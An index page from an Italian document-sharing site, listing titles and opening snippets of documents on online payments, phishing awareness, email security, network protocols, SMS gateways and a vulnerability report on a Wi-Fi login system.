L'INNOVAZIONE NELLE TUE MANI TP6758 CARTA DI CREDITO PayPal L'INNOVAZIONE NELLE TUE MANI sito web www.paypal.it/cartadicredito telefono 055/3069181 indirizzo Findomestic Banca Spa, Casella Postale 6279 CS/Novoli 50127 Firenze La tua

Dettagli

Protezione della posta elettronica mediante crittografia

Protezione della posta elettronica mediante crittografia Consorzio per la formazione e la ricerca in Ingegneria dell'informazione Politecnico di Milano Protezione della posta elettronica mediante crittografia Davide Cerri CEFRIEL - Area e-service e Technologies

Dettagli

LA STRONG AUTHENTICATION per la sicurezza dei pagamenti

LA STRONG AUTHENTICATION per la sicurezza dei pagamenti LA STRONG AUTHENTICATION per la sicurezza dei pagamenti 1 NOVITÀ PER PAGAMENTI PIU SICURI 2 SCEGLI LA MODALITA DI STRONG AUTHENTICATION - SMART APP - BASIC SMS 3 COME SI ATTIVA LA STRONG AUTHENTICATION

Dettagli

Le 12 truffe. 1. Phishing di beneficienza: attenzione alle donazioni

Le 12 truffe. 1. Phishing di beneficienza: attenzione alle donazioni Dagli scaffali dei supermercati, alle lucine che esordiscono nei centri storici delle nostre città, si sta avviando all' inizio la stagione commerciale delle feste natalizie. Gli acquisti sul web per riempire

Dettagli

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica.

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica. Sistemi e tecnologie per la multimedialità e telematica Fabio Burroni Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena burronif@unisi unisi.itit La Sicurezza delle Reti La presentazione

Dettagli

IDENTITÀ E FRODI IN INTERNET PHISHING, PHARMING E I MODI PER DIFENDERSI. R.Remoli

IDENTITÀ E FRODI IN INTERNET PHISHING, PHARMING E I MODI PER DIFENDERSI. R.Remoli - IDENTITÀ E FRODI I RISCHI CONNESSI AL FURTO DI IDENTITÀ IN INTERNET PHISHING, PHARMING E I MODI PER DIFENDERSI R.Remoli Di cosa parleremo Il furto d identità: caratteristiche e rischi concreti. Cos è

Dettagli

Sommario Prefazione... xiii Diventa esperto in sicurezza... xiii Capitolo 1... 1 Codici nocivi... 1

Sommario Prefazione... xiii Diventa esperto in sicurezza... xiii Capitolo 1... 1 Codici nocivi... 1 Sommario Prefazione... xiii Diventa esperto in sicurezza... xiii A chi è rivolto questo libro... xiii Una verità scomoda... xiv Il punto della situazione... xv Gli hacker e l hacking... xvii Distinzione

Dettagli

Newsletter: CARTE DI CREDITO

Newsletter: CARTE DI CREDITO Newsletter: CARTE DI CREDITO I pagamenti on-line: cosa bisogna sapere e come ci si deve tutelare. a cura della Dott.ssa Valentina Saccomanno in collaborazione con 1 Negli ultimi anni l ambito dell e- commerce

Dettagli

Servizi di rete e web. Prof. Maurizio Naldi A.A. 2015/16

Servizi di rete e web. Prof. Maurizio Naldi A.A. 2015/16 Servizi di rete e web Prof. Maurizio Naldi A.A. 2015/16 Applicazione Unità di trasmissione dati a livello applicazione Applicazione Presentazione Unità di trasmissione dati a livello presentazione Presentazione

Dettagli

Ministero dell Interno Compartimento Polizia Postale e delle Comunicazioni per la Lombardia MILANO

Ministero dell Interno Compartimento Polizia Postale e delle Comunicazioni per la Lombardia MILANO Ministero dell Interno Compartimento Polizia Postale e delle Comunicazioni per la Lombardia MILANO phishing and identity-related frauds Milano, 26 novembre 2008 Tutela dell informazione e crimini informatici

Dettagli

Il protocollo HTTP e HTTPS

Il protocollo HTTP e HTTPS Il protocollo HTTP e HTTPS Guida Apache di Openskills Introduzione al protocollo HTTP Il protocollo HTTP (Hyper Text Transfer Protocol) viene usato da tutti i client e server web e gestisce il modo con

Dettagli

Telematica II 13. Posta Elettronica

Telematica II 13. Posta Elettronica Posta Elettronica #1 la Posta Elettronica e basata su due componenti: s : applicativi utilizzati dall utente per comporre, inviare e leggere messaggi (p.e. Outlook) Telematica II 13. Posta Elettronica

Dettagli

Proteggi gli account personali

Proteggi gli account personali con la collaborazione di Proteggi gli account personali Pensi che il PHISHING sia solo un tipo di pesca? Pensi che i COOKIE siano solo biscotti? Pensi che un VIRUS sia solo un raffreddore? Proteggi gli

Dettagli

Cliente. senza codici d'accesso. accesso alla sezione Gestione Codici 0 #

Cliente. senza codici d'accesso. accesso alla sezione Gestione Codici 0 # Call Center PAG / Servizio IVR Interactive Voice Response ore su, 7 giorni su 7! Cliente Cliente 3 Non Cliente con codici d'accesso senza codici d'accesso informazioni commerciali accesso ai servizi con

Dettagli

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP Parte II - Reti di Calcolatori IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP 6-1 Applicazioni di Rete Domain Name System (DNS) Simple Network Manag. Protocol (SNMP) Posta elettronica Multipurpose Internet Mail

Dettagli

SMSPortal. SMS-Gateway interfaccia SMTP. Versione 1.0.0. 2004, 2005, 2006 SMSPortal. Digitel Mobile Srl Via Raffaello, 77 65124 Pescara (Italy)

SMSPortal. SMS-Gateway interfaccia SMTP. Versione 1.0.0. 2004, 2005, 2006 SMSPortal. Digitel Mobile Srl Via Raffaello, 77 65124 Pescara (Italy) SMS-Gateway interfaccia SMTP Versione 1.0.0 2004, 2005, 2006 SMSPortal 1 1 Introduzione 1.1 Sommario Solo gli utenti autorizzati hanno accesso al nostro SMS Gateway e possono trasmettere messaggi SMS attraverso

Dettagli

WEB SECURITY E E-COMMERCE

WEB SECURITY E E-COMMERCE WEB SECURITY E E-COMMERCE Desenzano D/G 25 gennaio 2013 1 Alcuni dati EUROSTAT Data from August 2012 Enterprise turnover from e-commerce, 2010 2 EUROSTAT Data from August 2012 Enterprises selling online,

Dettagli

Internet e posta elettronica. A cura di Massimiliano Buschi

Internet e posta elettronica. A cura di Massimiliano Buschi Internet e posta elettronica A cura di Massimiliano Buschi Concetti fondamentali Internet www Tcp/ip Browser Terminologia Esistono un sacco di termini con cui bisogna famigliarizzare http url Link Isp

Dettagli

Sicurezza. informatica. Peschiera Digitale 2102-2013 Sicurezza

Sicurezza. informatica. Peschiera Digitale 2102-2013 Sicurezza Sicurezza informatica Peschiera Digitale 2102-2013 Sicurezza Overview 1. Nozioni generali 2. Virus e anti-virus 3. Spam e anti-spam 4. Phishing 5. Social engineering 6. Consigli Peschiera Digitale 2102-2013

Dettagli

IPBX Office IPBX Office

IPBX Office IPBX Office IPBX Office IPBX Office include, oltre a tutte le funzioni di un centralino tradizionale, funzionalità avanzate quali ad esempio: voice mail con caselle vocali illimitate e personalizzate, risponditore

Dettagli

Protocolli per il Web. Impianti Informatici. Protocolli applicativi

Protocolli per il Web. Impianti Informatici. Protocolli applicativi Protocolli per il Web Protocolli applicativi I protocolli applicativi 2 Applicazioni Socket interface HTTP (WEB) SMTP (E-MAIL) FTP... NFS RPC DNS... Trasporto TCP UDP Rete ICMP RIP OSPF IP ARP RARP Non

Dettagli

La gestione e la prevenzione delle frodi esterne

La gestione e la prevenzione delle frodi esterne La gestione e la prevenzione delle frodi esterne Gianluigi Molinari Responsabile Ufficio Prevenzione Frodi Direzione Centrale Organizzazione e Sicurezza Roma 28/29 maggio 2012 Il fenomeno delle frodi è

Dettagli

Sicurezza delle operazioni

Sicurezza delle operazioni Sicurezza delle operazioni GUIDA PRATICA PER LA CLIENTELA www.pattichiari.it 2 Caro Lettore, PattiChiari è il Consorzio di banche nato per semplificare l uso dei prodotti bancari e per migliorare le conoscenze

Dettagli

Questo grafico mostra com è aumentato il numero di record per i programmi malevoli per SO Android nel database dei virus Dr.Web

Questo grafico mostra com è aumentato il numero di record per i programmi malevoli per SO Android nel database dei virus Dr.Web 1 Ruberia mobile Android è il sistema operativo per smartphone e tablet più popolare ed è il secondo più preferito dopo Windows dal punto di vista degli autori dei virus. I primi programmi malevoli per

Dettagli

GATEWAY SMS KYRON.IT Documentazione tecnica Versione 1.0 del 21/9/2004

GATEWAY SMS KYRON.IT Documentazione tecnica Versione 1.0 del 21/9/2004 GATEWAY SMS KYRON.IT Documentazione tecnica Versione 1.0 del 21/9/2004 1. INTRODUZIONE Gli utenti autorizzati all utilizzo dei servizi SMS Kyron possono inviare messaggi SMS da applicazioni custom che

Dettagli

Convegno Nazionale di Information Systems Auditing

Convegno Nazionale di Information Systems Auditing Convegno Nazionale di Information Systems Auditing Strategie di difesa dalle frodi: IT Governance e metodologie Verona, 25 Maggio 2006 Massimo Chiusi UniCredit S.p.A. Divisione Global Banking Services

Dettagli

MarketingDept. mar-13

MarketingDept. mar-13 mar-13 L Azienda Fondata nel 1988 Sede principale a Helsinki, Finlandia; uffici commerciali in oltre 100 paesi Attiva su tutti i segmenti di mercato, da Consumer a Corporate, specializzata nell erogazione

Dettagli

Elementi di Informatica e Programmazione

Elementi di Informatica e Programmazione Elementi di Informatica e Programmazione La Rete Internet Corsi di Laurea in: Ingegneria Civile Ingegneria per l Ambiente e il Territorio Università degli Studi di Brescia Che cos è Internet? Il punto

Dettagli

Configurazione manuale di Mozilla Thunderbird 5.0 per Uniba da casa.

Configurazione manuale di Mozilla Thunderbird 5.0 per Uniba da casa. Configurazione manuale di Mozilla Thunderbird 5.0 per Uniba da casa. Thunderbird è il client di posta elettronica open source (completamente gratuito) multipiattaforma sviluppato dal team di Mozilla. 1.

Dettagli

Spedire posta elettronica ad un utente dello stesso dominio, ma residente su un server non locale

Spedire posta elettronica ad un utente dello stesso dominio, ma residente su un server non locale MDaemon Spedire posta elettronica ad un utente dello stesso dominio, ma residente su un server non locale Abstract...2 Procedura 1...3 Procedura 2...4 Abstract In diverse realtà può capitare di avere la

Dettagli

Risparmio Postale Online Istruzioni operative

Risparmio Postale Online Istruzioni operative Istruzioni Operative RPOL Ed. Febbraio 2015 Risparmio Postale Online Istruzioni operative Poste Italiane S.p.A. - Società con socio unico Patrimonio BancoPosta 1 di 7 Caratteristiche del servizio... 3

Dettagli

Allegato 1. Le tecniche di frode on-line

Allegato 1. Le tecniche di frode on-line Allegato 1 Le tecniche di frode on-line Versione : 1.0 13 aprile 2011 Per una migliore comprensione delle tematiche affrontate nella circolare, riportiamo in questo allegato un compendio dei termini essenziali

Dettagli

Modulo 1. Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio

Modulo 1. Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio Modulo 1 Concetti di base della Tecnologia dell Informazione ( Parte 1.7) Rielaborazione dal WEB: prof. Claudio Pellegrini - Sondrio La sicurezza dei sistemi informatici Tutti i dispositivi di un p.c.

Dettagli

LA STRONG AUTHENTICATION BASIC SMS

LA STRONG AUTHENTICATION BASIC SMS LA STRONG AUTHENTICATION BASIC SMS 1 NOVITA PER PAGAMENTI PIU SICURI 2 SCEGLI LA MODALITA DI STRONG AUTHENTICATION: BASIC SMS 3 COME SI ATTIVA LA STRONG AUTHENTICATION 4 NUOVA CONFERMA DELLE OPERAZIONI

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

Email marketing ed invio newsletter. Invio di messaggi vocali personalizzati

Email marketing ed invio newsletter. Invio di messaggi vocali personalizzati Sistema online professionale per gestire il tuo mailing Email marketing ed invio newsletter SMS marketing Invio massivo di fax Invio di lettere cartacee (prioritaria o raccomandata) Invio di messaggi vocali

Dettagli

SICUREZZA IN RETE. Versione leggera. A cura di: M. Ivan Fabris. Progetto grafico e struttura: Ing. Michele Mordenti. Release : Forlì, 2008 10 04

SICUREZZA IN RETE. Versione leggera. A cura di: M. Ivan Fabris. Progetto grafico e struttura: Ing. Michele Mordenti. Release : Forlì, 2008 10 04 SICUREZZA IN RETE Versione leggera A cura di: M. Ivan Fabris Progetto grafico e struttura: Ing. Michele Mordenti Release : Forlì, 2008 10 04 SOMMARIO Jungla Selvaggia Attacchi illeggittimi e legittimi

Dettagli

Contatti profittevoli

Contatti profittevoli Contatti profittevoli paolo.vitali@yourvoice.com Milano, 25 gennaio 2002 CONTATTARE significa: Informare Proporre nuovi servizi / prodotti Suscitare nuove esigenze Cliente Utente Socio Collega Partner

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

LE CERTIFICAZIONI ECDL 12 GIUGNO 2014. Lucchetti Silvia

LE CERTIFICAZIONI ECDL 12 GIUGNO 2014. Lucchetti Silvia LE CERTIFICAZIONI ECDL 12 GIUGNO 2014 IL D.M. N. 308 DEL 22.05.2014 TABELLA A-B GRADUATORIA ASPIRANTI DOCENTI II-III FASCIA RICONOSCE UN MASSIMO DI 4 PUNTI PER LE CERTIFICAZIONI INFORMATICHE. SI PRECISA

Dettagli

Combattere lo spam con MDaemon e SPF

Combattere lo spam con MDaemon e SPF MDaemon Combattere lo spam con MDaemon e SPF Abstract... 2 Cos è SPF... 2 Configurazione di SPF in MDaemon... 3 Attivare SPF in MDaemon 7... 3 Attivare SPF in MDaemon 8... 4 Attivare SPF in MDaemon 9...

Dettagli

Internet gratuita in Biblioteca e nei dintorni

Internet gratuita in Biblioteca e nei dintorni Internet gratuita in Biblioteca e nei dintorni Per la navigazione è necessaria l iscrizione preventiva in Biblioteca, sia al Servizio Bibliotecario sia a quello internet Per poter accedere a Internet tramite

Dettagli

TECN.PROG.SIST.INF. Livello APPLICAZIONE - TELNET. Roberta Gerboni

TECN.PROG.SIST.INF. Livello APPLICAZIONE - TELNET. Roberta Gerboni Roberta Gerboni Protocollo TELNET Telnet è costituito da un insieme di componenti che consentono di trasformare un computer in un terminale remoto di un altro computer. Una sessione Telnet richiede: un

Dettagli

Lucidi a cura di Andrea Colombari, Carlo Drioli e Barbara Oliboni. Lezione 4

Lucidi a cura di Andrea Colombari, Carlo Drioli e Barbara Oliboni. Lezione 4 Lucidi a cura di Andrea Colombari, Carlo Drioli e Barbara Oliboni Lezione 4 Introduzione alle reti Materiale tratto dai lucidi ufficiali a corredo del testo: D. Sciuto, G. Buonanno e L. Mari Introduzione

Dettagli